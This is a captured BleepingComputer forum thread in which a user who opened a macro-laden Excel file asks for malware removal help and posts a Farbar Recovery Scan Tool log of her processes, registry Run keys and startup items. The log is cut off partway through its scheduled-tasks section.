www.bleepingcomputer.com
Open in
urlscan Pro
104.20.60.209
Public Scan
Submitted URL: https://www.bleepingcomputer.com/forums/t/770127/defender-finding-same-issue-over-and-over/#entry5336527
Effective URL: https://www.bleepingcomputer.com/forums/t/770127/defender-finding-same-issue-over-and-over/
Submission: On April 01 via api from US — Scanned from DE
Effective URL: https://www.bleepingcomputer.com/forums/t/770127/defender-finding-same-issue-over-and-over/
Submission: On April 01 via api from US — Scanned from DE
Form analysis 3 forms found in the DOM
POST https://www.bleepingcomputer.com/forums/index.php?app=core&module=search&do=search&fromMainBar=1
<form action="https://www.bleepingcomputer.com/forums/index.php?app=core&module=search&do=search&fromMainBar=1" method="post" id="search-box">
<fieldset>
<label for="main_search" class="hide">Search</label>
<a href="https://www.bleepingcomputer.com/forums/index.php?app=core&module=search&search_in=forums" title="Advanced Search" accesskey="4" rel="search" id="adv_search" class="right">Advanced</a>
<span id="search_wrap" class="right">
<input type="text" id="main_search" name="search_term" class="" size="17" tabindex="100" placeholder="Search...">
<span class="choice ipbmenu clickable" id="search_options" style="">This topic</span>
<ul id="search_options_menucontent" class="ipbmenu_content ipsPad" style="display: none; position: absolute; z-index: 9999;">
<li class="title" style="z-index: 10000;"><strong style="z-index: 10000;">Search section:</strong></li>
<li class="special" style="z-index: 10000;">
<label for="s_topic" title="This topic" style="z-index: 10000;">
<input type="radio" name="search_app" value="forums:topic:770127" class="input_radio" id="s_topic" checked="checked" style="z-index: 10000;"><strong style="z-index: 10000;">This topic</strong>
</label>
</li>
<li class="app" style="z-index: 10000;"><label for="s_forums" title="Forums" style="z-index: 10000;"><input type="radio" name="search_app" class="input_radio" id="s_forums" value="forums" style="z-index: 10000;">Forums</label></li>
<li class="app" style="z-index: 10000;"><label for="s_members" title="Members" style="z-index: 10000;"><input type="radio" name="search_app" class="input_radio" id="s_members" value="members" style="z-index: 10000;">Members</label></li>
<li class="app" style="z-index: 10000;"><label for="s_core" title="Help Files" style="z-index: 10000;"><input type="radio" name="search_app" class="input_radio" id="s_core" value="core" style="z-index: 10000;">Help Files</label></li>
<li class="app" style="z-index: 10000;">
<label for="s_calendar" title="Calendar" style="z-index: 10000;">
<input type="radio" name="search_app" class="input_radio" id="s_calendar" value="calendar" style="z-index: 10000;">Calendar </label>
</li>
</ul>
<input aria-label="Search the forum" type="submit" class="submit_input clickable" value="">
</span>
</fieldset>
</form>POST https://www.bleepingcomputer.com/forums/index.php?
<form id="modform" method="post" action="https://www.bleepingcomputer.com/forums/index.php?">
<input type="hidden" name="app" value="forums">
<input type="hidden" name="module" value="moderate">
<input type="hidden" name="section" value="moderate">
<input type="hidden" name="do" value="postchoice">
<input type="hidden" name="f" value="22">
<input type="hidden" name="t" value="770127">
<input type="hidden" name="auth_key" value="880ea6a14ea49e853634fbdc5015a024">
<input type="hidden" name="st" value="">
<input type="hidden" name="page" value="">
<input type="hidden" value="" name="selectedpidsJS" id="selectedpidsJS">
<input type="hidden" name="tact" id="tact" value="">
</form>POST https://www.bleepingcomputer.com/forums/index.php?app=core&module=global§ion=login&do=process
<form action="https://www.bleepingcomputer.com/forums/index.php?app=core&module=global&section=login&do=process" method="post" id="login">
<input type="hidden" name="auth_key" value="880ea6a14ea49e853634fbdc5015a024">
<input type="hidden" name="referer" value="https://www.bleepingcomputer.com/forums/t/770127/defender-finding-same-issue-over-and-over/">
<h3>Sign In</h3>
<div class="ipsBox_notice">
<ul class="ipsList_inline">
<li>
<a href="https://www.bleepingcomputer.com/forums/index.php?app=core&module=global&section=login&serviceClick=twitter" class="ipsButton_secondary"><img src="https://www.bleepingcomputer.com/forums/public/style_images/master/loginmethods/twitter.png" alt="Twitter"> Use Twitter</a>
</li>
</ul>
</div>
<br>
<div class="ipsForm ipsForm_horizontal">
<fieldset>
<ul>
<li class="ipsField">
<div class="ipsField_content"> Need an account? <a href="https://www.bleepingcomputer.com/forums/index.php?app=core&module=global&section=register" title="Register now!">Register now!</a>
</div>
</li>
<li class="ipsField ipsField_primary">
<label for="ips_username" class="ipsField_title">Username</label>
<div class="ipsField_content">
<input id="ips_username" type="text" class="input_text" name="ips_username" size="30" tabindex="0">
</div>
</li>
<li class="ipsField ipsField_primary">
<label for="ips_password" class="ipsField_title">Forum Password</label>
<div class="ipsField_content">
<input id="ips_password" type="password" class="input_text" name="ips_password" size="30" tabindex="0"><br>
<a href="https://www.bleepingcomputer.com/forums/index.php?app=core&module=global&section=lostpass" title="Retrieve password">I've forgotten my password</a>
</div>
</li>
<li class="ipsField ipsField_checkbox">
<input type="checkbox" id="inline_remember" checked="checked" name="rememberMe" value="1" class="input_check" tabindex="0">
<div class="ipsField_content">
<label for="inline_remember">
<strong>Remember me</strong><br>
<span class="desc lighter">This is not recommended for shared computers</span>
</label>
</div>
</li>
<li class="ipsField ipsField_checkbox">
<input type="checkbox" id="inline_invisible" name="anonymous" value="1" class="input_check" tabindex="0">
<div class="ipsField_content">
<label for="inline_invisible">
<strong>Sign in anonymously</strong><br>
<span class="desc lighter">Don't add me to the active users list</span>
</label>
</div>
</li>
<li class="ipsPad_top ipsForm_center desc ipsType_smaller">
<a rel="nofollow" href="https://www.bleepingcomputer.com/forums/privacypolicy/">Privacy Policy</a>
</li>
</ul>
</fieldset>
<div class="ipsForm_submit ipsForm_center">
<input type="submit" class="ipsButton" value="Sign In" tabindex="0">
</div>
</div>
</form>Text Content
WE VALUE YOUR PRIVACY
We and our partners store and/or access information on a device, such as cookies
and process personal data, such as unique identifiers and standard information
sent by a device for personalised ads and content, ad and content measurement,
and audience insights, as well as to develop and improve products.
With your permission we and our partners may use precise geolocation data and
identification through device scanning. You may click to consent to our and our
partners’ processing as described above. Alternatively you may access more
detailed information and change your preferences before consenting or to refuse
consenting. Please note that some processing of your personal data may not
require your consent, but you have a right to object to such processing. Your
preferences will apply to this website only. You can change your preferences at
any time by returning to this site or visit our privacy policy.
MORE OPTIONSAGREE
* Sign In
* Create Account
Search Advanced This topic
* Search section:
* This topic
* Forums
* Members
* Help Files
* Calendar
*
* View New Content
* Forum Rules
* BleepingComputer.com
* Forums
* Members
* Tutorials
* Startup List
* Virus Removal
* Downloads
* Uninstall List
* Welcome Guide
* More
1. BleepingComputer.com
2. → Security
3. → Virus, Trojan, Spyware, and Malware Removal Help
Javascript Disabled Detected
You currently have javascript disabled. Several functions may not work. Please
re-enable javascript to access full functionality.
Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come
together to discuss and learn how to use their computers. Using the site is easy
and fun. As a guest, you can browse and view the various discussions in the
forums, but can not create a new topic or reply to an existing one unless you
are logged in. Other benefits of registering an account are subscribing to
topics and forums, creating a blog, and having no ads shown anywhere on the
site.
Click here to Register a free account now! or read our Welcome Guide to learn
how to use this site.
Latest News: Beastmode botnet boosts DDoS power with new router exploits
Featured Deal: Take a bet on what you'll get in this $60 tech mystery box deal
DEFENDER FINDING SAME ISSUE OVER AND OVER
Started by ktait80 , Mar 23 2022 08:37 AM
* Page 1 of 4
* 1
* 2
* 3
* Next
* »
* Please log in to reply
51 replies to this topic
#1 KTAIT80
ktait80
*
* Members
* 30 posts
* ONLINE
* Local time:02:27 PM
Posted 23 March 2022 - 08:37 AM
Good Morning:
I goofed and opened a excel that was NOT from a client. It had a macro attached
so I'm pretty sure I'm infected. Windows defender keeps finding the same problem
and quarantining it over and over. I ran the FRST64 and have attached the txt
files.
At this point, I'm using my backup laptop to minimize any impact I may be
getting.
Thank you in advance.
Karin
FRST.txt 70.13KB 4 downloads Addition.txt 120.15KB 4 downloads
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 20-03-2022
Ran by Karin Hostetler (administrator) on DESKTOP-ID6UD18 (LENOVO 90BG003JUS)
(23-03-2022 08:53:32)
Running from C:\Users\Karin Hostetler\Desktop\Delete
Loaded Profiles: Karin Hostetler & QBDataServiceUser30 & QBDataServiceUser31 &
QBDataServiceUser32
Platform: Microsoft Windows 10 Home Version 21H2 19044.1586 (X64) Language:
English (United States)
Default browser: Chrome
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file
will not be moved.)
(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program
Files\AMD\CNext\CNext\AMDRSServ.exe
(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program
Files\AMD\CNext\CNext\RadeonSoftware.exe
(C:\Program Files (x86)\Common
Files\Intuit\QuickBooks\QBWebConnector3.0\Intuit.QBDT.Webconnector.QBWCMonitor.exe
->) (Intuit, Inc. -> ) C:\Program Files (x86)\Common
Files\Intuit\QuickBooks\QBWebConnector3.0\Intuit.QBDT.Webconnector.Application.exe
(C:\Program Files (x86)\ExpressVPN\bootstrap\amd64\nssm.exe ->) (EXPRSVPN LLC ->
ExpressVPN) C:\Program Files (x86)\ExpressVPN\expressvpnd\expressvpnd.exe
(C:\Program Files (x86)\GoToAssist Remote Support
Customer\1702\g2ax_comm_customer.exe ->) (LogMeIn, Inc. -> LogMeIn, Inc.)
C:\Program Files (x86)\GoToAssist Remote Support
Customer\1702\g2ax_system_customer.exe
(C:\Program Files (x86)\GoToAssist Remote Support
Customer\1702\g2ax_comm_customer.exe ->) (LogMeIn, Inc. -> LogMeIn, Inc.)
C:\Program Files (x86)\GoToAssist Remote Support
Customer\1702\g2ax_user_customer.exe
(C:\Program Files (x86)\GoToAssist Remote Support Customer\1702\g2ax_service.exe
->) (LogMeIn, Inc. -> LogMeIn, Inc.) C:\Program Files (x86)\GoToAssist Remote
Support Customer\1702\g2ax_comm_customer.exe
(C:\Program Files (x86)\GoToAssist Remote Support
Expert\1702\g2ax_comm_expert.exe ->) (LogMeIn, Inc. -> LogMeIn, Inc.) C:\Program
Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_user_expert.exe
(C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_start.exe ->)
(LogMeIn, Inc. -> LogMeIn, Inc.) C:\Program Files (x86)\GoToAssist Remote
Support Expert\1702\g2ax_comm_expert.exe
(C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\QBW32.EXE
->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\splwow64.exe
(C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\QBW32.EXE
->) (The CefSharp Authors) [File not signed] C:\Program Files
(x86)\Intuit\QuickBooks Enterprise Solutions 21.0\CefSharp.BrowserSubprocess.exe
<2>
(C:\Program Files\AMD\CNext\CNext\AMDRSServ.exe ->) (Advanced Micro Devices,
Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\amdow.exe
(C:\Program Files\AMD\Performance Profile Client\AUEPLauncher.exe ->) (AMD)
[File not signed] C:\Program Files\AMD\Performance Profile Client\AUEPMaster.exe
(C:\Program Files\AMD\Performance Profile Client\AUEPMaster.exe ->) (AMD) [File
not signed] C:\Program Files\AMD\Performance Profile Client\AUEPUF.exe
(C:\Program Files\Logitech\SetPointP\SetPoint.exe ->) (Logitech -> Logitech,
Inc.) C:\Program Files\Common Files\LogiShrd\KHAL3\KHALMNPR.exe
(C:\Program Files\Logitech\SetPointP\SetPoint.exe ->) (Logitech Inc -> Logitech,
Inc.) C:\Program Files\Logitech\SetPointP\LogiAppBroker.exe
(C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2202.4-0\MsMpEng.exe
->) (Microsoft Windows Publisher -> Microsoft Corporation)
C:\ProgramData\Microsoft\Windows
Defender\Platform\4.18.2202.4-0\MpCopyAccelerator.exe
(C:\Windows\jmesoft\Service.exe ->) () [File not signed]
C:\Windows\jmesoft\JME_LOAD.exe
(Carbonite, Inc. -> Carbonite, Inc.) C:\Program Files (x86)\Carbonite\Carbonite
Backup\CarboniteUI.exe
(CyberLink -> CyberLink) C:\Program Files (x86)\Lenovo\Power2Go\CLMLSvc.exe
(DriverStore\FileRepository͠470.inf_amd64_35c64671e7fac064\B360357\atiesrxx.exe
->) (Advanced Micro Devices, Inc. -> AMD)
C:\Windows\System32\DriverStore\FileRepository͠470.inf_amd64_35c64671e7fac064\B360357\atieclxx.exe
(DYMO) [File not signed] C:\Program Files (x86)\DYMO\DYMO Label
Software\DYMO.DLS.Printing.Host.exe
(explorer.exe ->) (Acresso Software Inc. -> Acresso Corporation)
C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe
(explorer.exe ->) (Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Chrome\Application\chrome.exe <30>
(explorer.exe ->) (Logitech Inc -> Logitech, Inc.) C:\Program
Files\Logitech\SetPointP\SetPoint.exe
(explorer.exe ->) (LogMeIn, Inc. -> LogMeIn, Inc.) C:\Program Files
(x86)\GoToAssist Remote Support Expert\1702\g2ax_start.exe
(explorer.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor)
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Update\1.3.36.122\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files
(x86)\Google\Update\1.3.36.122\GoogleCrashHandler64.exe
(Intuit, Inc. -> Intuit Inc.) C:\Program Files (x86)\Intuit\QuickBooks
Enterprise Solutions 21.0\QBW32.EXE
(Lenovo (Beijing) Limited -> Lenovo Group Limited) C:\Users\Karin
Hostetler\AppData\Local\Programs\Lenovo\Lenovo Service Bridge\LSB.exe
(Lenovo) [File not signed] C:\Windows\jmesoft\hotkey.exe
(Microsoft Corporation -> Microsoft Corporation)
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\taskkill.exe
<3>
(Nuance Communications, Inc. -> Nuance Communications, Inc.) C:\Program Files
(x86)\Nuance\PaperPort\pptd40nt.exe
(Nuance Communications, Inc. -> Nuance Communications, Inc.) C:\Program Files
(x86)\Nuance\PDF Viewer Plus\pdfPro5Hook.exe
(Nuance Communications, Inc. -> Nuance Communications, Inc.) C:\Program Files
(x86)\Nuance\Power PDF 21\NPDFLM.exe
(services.exe ->) () [File not signed] C:\Windows\jmesoft\Service.exe
(services.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common
Files\Adobe\ARM\1.0\armsvc.exe
(services.exe ->) (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files
(x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(services.exe ->) (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files
(x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(services.exe ->) (Adobe Systems Incorporated -> Adobe Inc.) C:\Program Files
(x86)\Common Files\Adobe\Adobe Desktop
Common\ElevationManager\AdobeUpdateService.exe
(services.exe ->) (Advanced Micro Devices, Inc. -> AMD)
C:\Windows\System32\DriverStore\FileRepository͠470.inf_amd64_35c64671e7fac064\B360357\atiesrxx.exe
(services.exe ->) (AMD) [File not signed] C:\Program Files\AMD\Performance
Profile Client\AUEPLauncher.exe
(services.exe ->) (Apple Inc. -> Apple Inc.) C:\Program
Files\Bonjour\mDNSResponder.exe
(services.exe ->) (Brother Industries, Ltd.) [File not signed] C:\Program Files
(x86)\Browny02\BrYNSvc.exe
(services.exe ->) (Carbonite, Inc. -> Carbonite, Inc. (www.carbonite.com))
C:\Program Files\Carbonite\Carbonite Backup\CarboniteService.exe
(services.exe ->) (EXPRSVPN LLC -> ExpressVPN) C:\Program Files
(x86)\ExpressVPN\bootstrap\amd64\nssm.exe
(services.exe ->) (Hewlett-Packard Company -> HP)
C:\Windows\System32\HPSIsvc.exe
(services.exe ->) (Intuit Inc.) [File not signed] C:\Program Files (x86)\Common
Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe
(services.exe ->) (Intuit, Inc. -> ) C:\Program Files (x86)\Common
Files\Intuit\QuickBooks\QBWebConnector3.0\Intuit.QBDT.Webconnector.QBWCMonitor.exe
(services.exe ->) (Intuit, Inc. -> Intuit Inc.) C:\Program Files (x86)\Common
Files\Intuit\DataProtect\QBIDPService.exe
(services.exe ->) (Intuit, Inc. -> Intuit Inc.) C:\Program Files\Common
Files\Intuit\QuickBooks\QBCFMonitorService.exe
(services.exe ->) (Intuit, Inc. -> SAP SE or an SAP affiliate company)
C:\Program Files (x86)\Intuit\QuickBooks 2020\QBDBMgrN.exe
(services.exe ->) (Intuit, Inc. -> SAP SE or an SAP affiliate company)
C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\QBDBMgrN.exe
(services.exe ->) (Intuit, Inc. -> SAP SE or an SAP affiliate company)
C:\Program Files\Intuit\QuickBooks Enterprise Solutions 22.0\QBDBMgrN.exe
(services.exe ->) (Lenovo -> Lenovo Group Ltd.) C:\Program Files
(x86)\Lenovo\VantageService\LenovoVantageService.exe
(services.exe ->) (Lenovo -> Lenovo Group Ltd.)
C:\Windows\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe
(services.exe ->) (LENOVO -> Lenovo) C:\Program
Files\Lenovo\LiveStorage\Server\LiveStorageServer.exe
(services.exe ->) (LogMeIn, Inc. -> LogMeIn, Inc.) C:\Program Files
(x86)\GoToAssist Remote Support Customer\1702\g2ax_service.exe
(services.exe ->) (Microsoft Windows Hardware Compatibility Publisher -> Realtek
Semiconductor Corp.) C:\Windows\RtkBtManServ.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation)
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2202.4-0\MsMpEng.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation)
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2202.4-0\NisSrv.exe
(services.exe ->) (Nuance Communications, Inc. -> Nuance Communications, Inc.)
C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe
(services.exe ->) (Realtek Semiconductor Corp -> Realtek Semiconductor Corp.)
C:\Program Files (x86)\Realtek\Realtek Bluetooth Filter ONLY\BTDevMgr.exe
(services.exe ->) (Sanford, L.P. -> Sanford, L.P.) C:\Program Files
(x86)\DYMO\DYMO Label Software\DymoPnpService.exe
(svchost.exe ->) (Adobe Systems Incorporated) C:\Program
Files\WindowsApps\AcrobatNotificationClient_1.0.4.0_x86__e1rzdqpraam7r\AcrobatNotificationClient.exe
(svchost.exe ->) (CyberLink Corp. -> CyberLink Corp.) C:\Program Files
(x86)\Cyberlink\PowerDVD14\PDVD14Serv.exe
(svchost.exe ->) (Intuit, Inc. -> Intuit Inc.) C:\Program Files (x86)\Common
Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program
Files\WindowsApps\Microsoft.549981C3F5F10_3.2202.10603.0_x64__8wekyb3d8bbwe\Cortana.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program
Files\WindowsApps\Microsoft.MicrosoftStickyNotes_4.2.2.0_x64__8wekyb3d8bbwe\Microsoft.Notes.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program
Files\WindowsApps\Microsoft.WindowsCalculator_10.2103.8.0_x64__8wekyb3d8bbwe\Calculator.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation)
C:\ProgramData\milon.com
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation)
C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation)
C:\Windows\System32\dllhost.exe <2>
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation)
C:\Windows\System32\smartscreen.exe
(svchost.exe ->) (SweetLabs Inc. -> SweetLabs, Inc) C:\Users\Karin
Hostetler\AppData\Local\Host App Service\Engine\HostAppServiceUpdater.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to
default or removed. The file will not be moved.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
[16695816 2016-08-21] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe
[3113592 2015-08-25] (Logitech Inc -> Logitech, Inc.)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common
Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3426560 2021-11-23] (Adobe Inc.
-> Adobe Systems, Incorporated)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common
Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe
Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [CLMLServer] => C:\Program Files
(x86)\Lenovo\Power2Go\CLMLSvc.exe [103720 2009-12-04] (CyberLink -> CyberLink)
HKLM-x32\...\Run: [UpdateP2GoShortCut] => C:\Program Files
(x86)\Lenovo\Power2Go\MUITransfer\MUIStartMenu.exe [214312 2011-12-06]
(CyberLink -> CyberLink Corp.)
HKLM-x32\...\Run: [jmekey] => C:\Windows\jmesoft\hotkey.exe [118784 2013-07-24]
(Lenovo) [File not signed]
HKLM-x32\...\Run: [jmesoft] => C:\Windows\jmesoft\ServiceLoader.exe [28672
2011-08-17] () [File not signed]
HKLM-x32\...\Run: [PowerPDF Registry Controller] => C:\Program Files
(x86)\Nuance\Power PDF 21\RegistryController.exe [274216 2017-05-16] (Nuance
Communications, Inc. -> Nuance Communications, Inc.)
HKLM-x32\...\Run: [NuanPowerPdf1NPDFLM] => C:\Program Files (x86)\Nuance\Power
PDF 21\NPDFLM.exe [3464816 2017-05-16] (Nuance Communications, Inc. -> Nuance
Communications, Inc.)
HKLM-x32\...\Run: [Nuance Power PDF Standard-reminder] => C:\Program Files
(x86)\Nuance\Power PDF 21\Ereg\Ereg.exe [3164280 2016-05-06] (Nuance
Communications, Inc. -> Nuance Communications, Inc.)
HKLM-x32\...\Run: [IndexSearch] => C:\Program Files
(x86)\Nuance\PaperPort\IndexSearch.exe [46952 2011-08-02] (Nuance
Communications, Inc. -> Nuance Communications, Inc.)
HKLM-x32\...\Run: [PaperPort PTD] => C:\Program Files
(x86)\Nuance\PaperPort\pptd40nt.exe [30568 2011-08-02] (Nuance Communications,
Inc. -> Nuance Communications, Inc.)
HKLM-x32\...\Run: [PDFHook] => C:\Program Files (x86)\Nuance\PDF Viewer
Plus\pdfpro5hook.exe [636192 2010-03-05] (Nuance Communications, Inc. -> Nuance
Communications, Inc.)
HKLM-x32\...\Run: [PDF5 Registry Controller] => C:\Program Files
(x86)\Nuance\PDF Viewer Plus\RegistryController.exe [62752 2010-03-05] (Nuance
Communications, Inc. -> Nuance Communications, Inc.)
HKLM-x32\...\Run: [ControlCenter4] => C:\Program Files
(x86)\ControlCenter4\BrCcBoot.exe [146584 2017-11-07] (Brother Industries, Ltd.
-> Brother Industries, Ltd.)
HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files
(x86)\Browny02\Brother\BrStMonW.exe [3084288 2012-07-31] (Brother Industries,
Ltd.) [File not signed]
HKLM-x32\...\Run: [HPUsageTrackingLEDM] => "C:\Program Files (x86)\HP\HP UT
LEDM\bin\hppusg.exe" "C:\Program Files (x86)\HP\HP UT LEDM\" (No File)
HKLM-x32\...\Run: [MobisynapseSyncHelper] => C:\Program Files
(x86)\Mobisynapse\MobisynapseSyncHelper.exe (No File)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe
Creative Cloud\ACC\Creative Cloud.exe [2410960 2019-03-01] (Adobe Systems
Incorporated -> Adobe Inc.)
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files
(x86)\Adobe\Acrobat DC\Acrobat\Acrotray.exe [5818592 2022-03-02] (Adobe Inc. ->
Adobe Systems Inc.)
HKLM-x32\...\Run: [BYRUA_AGENT] =>
"C:\LGMobileUpgrade\LGMOBILEAX\BYR_Client\VZWUAAgent.exe" -start (No File)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Carbonite Backup] => C:\Program Files
(x86)\Carbonite\Carbonite Backup\CarboniteUI.exe [1283432 2021-01-21]
(Carbonite, Inc. -> Carbonite, Inc.)
HKLM-x32\...\Run: [ExpressVPNNotificationService] => C:\Program Files
(x86)\ExpressVPN\expressvpn-ui\ExpressVPNNotificationServiceStarter.exe [370032
2021-03-22] (EXPRSVPN LLC -> ExpressVPN)
HKLM-x32\...\Run: [DYMOWebApi] => "C:\Program Files (x86)\DYMO\DYMO
Connect\DYMO.WebApi.Win.Host.exe" /auto (No File)
HKLM-x32\...\Run: [DLSService] => "C:\Program Files (x86)\DYMO\DYMO Label
Software\DLSService.exe" (No File)
HKLM-x32\...\Run: [DLSWebSvc] => C:\Program Files (x86)\DYMO\DYMO Label
Software\DYMO.DLS.Printing.Host.exe [4869120 2016-09-13] (DYMO) [File not
signed]
HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\Run: [ISUSPM] =>
C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe [222496 2009-05-05] (Acresso
Software Inc. -> Acresso Corporation)
HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\Run: [Adobe Acrobat
Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat
DC\Acrobat\AdobeCollabSync.exe [5411552 2022-03-02] (Adobe Inc. -> Adobe Systems
Incorporated)
HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\Run: [BYRUA_AGENT] =>
"C:\LGMobileUpgrade\LGMOBILEAX\BYR_Client\VZWUAAgent.exe" -start (No File)
HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\Run: [GoToAssist Remote
Support Expert] => C:\Program Files (x86)\GoToAssist Remote Support
Expert\1702\g2ax_start.exe [614856 2021-07-15] (LogMeIn, Inc. -> LogMeIn, Inc.)
HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\MountPoints2:
{16a4cf3f-21cc-11ea-84fd-c83dd4456ee6} - "G:\SISetup.exe"
HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\MountPoints2:
{dd6bec4e-07fd-11eb-8535-c83dd4456ee6} -
"E:\VerizonSWUpgradeAssistantLauncher.exe"
HKLM\...\Windows x64\Print Processors\HP1100PrintProc:
C:\Windows\System32\spool\prtprocs\x64\HP1100PP.DLL [74240 2012-08-31]
(Microsoft Windows Hardware Compatibility Publisher -> )
HKLM\...\Print\Monitors\Adobe PDF Port Monitor: C:\WINDOWS\system32\AdobePDF.dll
[203936 2021-12-24] (Adobe Inc. -> Adobe Systems Inc)
HKLM\...\Print\Monitors\Advanced TCP/IP Port Monitor:
C:\WINDOWS\system32\mvtcpmon.dll [541184 2009-06-25] (Marvell Semiconductor,
Inc.) [File not signed]
HKLM\...\Print\Monitors\DYMO LabelWriter Monitor:
C:\WINDOWS\system32\LW400MON.DLL [16384 2018-05-11] (Microsoft Windows Hardware
Compatibility Publisher -> DYMO Corp.)
HKLM\...\Print\Monitors\HP1100LM: C:\WINDOWS\system32\HP1100LM.DLL [288768
2012-08-31] (Microsoft Windows Hardware Compatibility Publisher -> )
HKLM\Software\Microsoft\Active Setup\Installed Components:
[{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files
(x86)\Google\Chrome\Application\99.0.4844.82\Installer\chrmstp.exe [2022-03-21]
(Google LLC -> Google LLC)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components:
[{296985B0-9E7B-49B0-9C65-7847A6489C4D}] -> C:\Program Files (x86)\ASAP
Utilities\Add_ASAP_Utilities_to_the_Excel_menu.exe [2021-04-14] (A Must in Every
Office B.V. -> )
HKLM\Software\...\Authentication\Credential Providers:
[{D025C57A-763E-4B14-B580-9B5B161F08BB}] ->
C:\WINDOWS\system32\g2ax_credential_provider64_1702.dll [2021-05-15] (LogMeIn,
Inc. -> LogMeIn, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install
LastPass IE RunOnce.lnk [2017-03-11]
ShortcutTarget: Install LastPass IE RunOnce.lnk -> C:\Program Files (x86)\Common
Files\lpuninstall.exe (LastPass (Marvasol Inc) -> LastPass)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Intuit
Data Protect.lnk [2021-07-20]
ShortcutTarget: Intuit Data Protect.lnk -> C:\Program Files (x86)\Common
Files\Intuit\DataProtect\IntuitDataProtect.exe (Intuit, Inc. -> Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks
Update Agent.lnk [2021-07-20]
ShortcutTarget: QuickBooks Update Agent.lnk -> C:\Program Files (x86)\Common
Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (Intuit, Inc. -> Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks
Web Connector.lnk [2021-07-20]
ShortcutTarget: QuickBooks Web Connector.lnk -> C:\Program Files (x86)\Common
Files\Intuit\QuickBooks\QBWebConnector\QBWebConnector.exe (Intuit, Inc. ->
Intuit)
Startup: C:\ProgramData\Microsoft\Windows\Start
Menu\Programs\Startup\QuickBooks_Standard_21.lnk [2021-07-20]
ShortcutTarget: QuickBooks_Standard_21.lnk -> C:\Program Files
(x86)\Intuit\QuickBooks Enterprise Solutions 21.0\QBW32.EXE (Intuit, Inc. ->
Intuit Inc.)
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry.
The file will not be moved unless listed separately.)
Task: {02327D63-A754-4FB5-A387-79010CADB77E} -
